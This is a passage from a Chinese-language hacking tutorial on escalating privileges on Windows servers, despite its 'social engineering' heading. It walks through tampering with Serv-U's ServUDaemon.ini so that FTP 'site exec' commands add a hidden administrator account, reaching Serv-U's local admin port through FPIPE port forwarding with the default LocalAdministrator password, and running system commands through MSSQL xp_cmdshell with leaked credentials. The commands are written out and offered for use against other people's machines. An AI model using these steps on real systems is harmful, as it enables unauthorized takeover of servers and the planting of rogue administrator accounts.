社會工程學
Guest許可權提升利用Serv-U提升許可權共有三種方法,溢出是第一種,之前已經說過,這裡就不介紹了。要講的是其餘兩種辦法。
辦法一:要求:對Serv-u安裝目錄有完全控制權。
方法:進入對方的Serv-U目錄,察看他的ServUDaemon.ini,這是Serv-U的配置檔案,如果管理員沒有選擇將serv- u的所有配置寫入註冊表的話,就可以從這個檔案中看到Serv-U的所有信息,版本、IP、甚至用戶名與密碼!早些版本的密碼是不加密的,但是後來是經過了MD5加密。所以不能直接得到其密碼。不過仍然有辦法:先在本地安裝一個Serv-U(版本最好新點),將自己的ServUDaemon.ini檔案用從他那下載下來的ServUDaemon.ini 覆蓋掉,重起一下Serv-U,於是上面的所有配置都與他的一模一樣了。新建一個用戶,什麼組不重要,重要的是將主目錄改為對方的系統盤,然後加上執行許可權!這個最重要。更改完後套用,退出。再將更改過的ServUDaemon.ini 檔案上傳,覆蓋掉檔案,然後就等Serv-U重啟更新配置,之後就可以登入FTP。進入後執行以下命令:
Cd windows
Cd System32
Quote site exec net.exe user wofeiwo /add
Quote site exec net.exe localgroup administrators wofeiwo /add
Bye
然後就有了一個叫wofeiwo的系統管理員了,還等什麼?登入3389,大功告成!
辦法二:Serv-u開了兩個連線埠,一個是21,也就是FTP了,而另一個是43958,這個連線埠是乾什麼的?嘿嘿,這個是Serv-U的本地管理連線埠。但是默認是不準除了127.0.0.1外的ip連線的,此時就要用到FPIPE.exe檔案,這是一個連線埠轉發程式,上傳他,執行命令:
Fpipe –v –l 3333 –r 43958 127.0.0.1
意思是將4444連線埠映射到43958連線埠上。
然後就可以在本地安裝一個Serv-u,新建一個伺服器,IP填對方IP,帳號為LocalAdministrator 密碼為#1@$ak#.1k;0@p 連線上後你就可以管理Serv-u了,之後提升許可權的方法參考辦法一。
SQL帳戶密碼泄露
如果對方開了MSSQL伺服器,就可以通過用SQL連線器加管理員帳號,因為MSSQL是默認的SYSTEM許可權。
要求:得到了對方MSSQL管理員密碼(可以從連線資料庫的ASP檔案中看到),對方沒有刪除xp_cmdshell
方法:使用Sqlexec.exe,在host 一欄中填入對方IP,User與Pass中填入所得到的用戶名與密碼。Format選擇xp_cmdshell”%s”即可。然後點擊connect,連線上後就可以在CMD一欄中輸入想要的CMD命令了。
總之,以上的8種方法並不是絕對的,最主要的是思路,每種方法互相結合,才能發揮其應有的效應。
